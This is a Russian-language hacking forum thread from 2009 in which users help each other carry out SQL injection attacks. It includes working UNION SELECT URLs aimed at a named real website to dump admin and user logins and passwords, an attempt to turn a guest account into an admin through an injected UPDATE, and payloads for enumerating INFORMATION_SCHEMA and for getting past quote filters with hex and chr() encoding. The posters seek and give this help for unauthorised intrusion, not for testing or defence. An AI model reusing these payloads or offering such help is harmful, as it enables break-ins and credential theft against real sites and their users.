Ваши вопросы по уязвимостям.

29.01.2009, 03:13

omel

Новичок

Регистрация: 26.06.2007

Сообщений: 27

Провел на форуме:
267117

Репутация: 1

Цитата:

Сообщение от groundhog

Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!

Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1

29.01.2009, 03:25

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.

Последний раз редактировалось Велемир; 29.01.2009 в 03:29..

29.01.2009, 03:32

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Цитата:

Сообщение от Велемир

Я и говорю, хекс не катит, а char действует. Просто надо чарить не как в MYSQL...

Вот например таблица user, переведённая в char для PostgreSQL.

chr(117)||chr(115)||chr(101)||chr(114)

29.01.2009, 02:27

TELO

Познающий

Регистрация: 21.01.2009

Сообщений: 98

Провел на форуме:
227123

Репутация: 122

Народ,нужна помощь...думаю даже вам будет интересно...и так:
есть скуль(5 ветка)

Код:

http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,username,3,password,5,6,7,8,9,10,11%20%20FROM%20admin

Код:

http://www.krimsex.com/admin.php

пароль не подходит. вопрос..почему?
ето не все, то была табла admin,есть ещё табла users

Код:

http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,login,3,password,5,6,7,8,9,10,11%20%20FROM%20users

пробывал лимитом 10 акков,не один не подошол..
вход для юзеров тут:

Код:

http://www.krimsex.com/login.php

Очень большая просьба помочь

Последний раз редактировалось TELO; 29.01.2009 в 02:30..

29.01.2009, 02:34

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+limit+1+offset+20)--

Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36

ЗЫ: postgre_sql()

29.01.2009, 02:39

TELO

Познающий

Регистрация: 21.01.2009

Сообщений: 98

Провел на форуме:
227123

Репутация: 122

Цитата:

Сообщение от Велемир

Вот запрос - выдергивает все таблицы, в которых есть колонка "password"

Код:

UNION+SELECT+group_concat(table_name)+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--

так же в хексе можна вставить любое название колонки

29.01.2009, 02:50

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Цитата:

Сообщение от Велемир

www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='табл ица'--

offset - это тот же limit в MYSQL.

TELO,

Надо не хексить, а переводить в char..
К тому же, вопрос был совсем другой.

Последний раз редактировалось R1dex; 29.01.2009 в 02:56..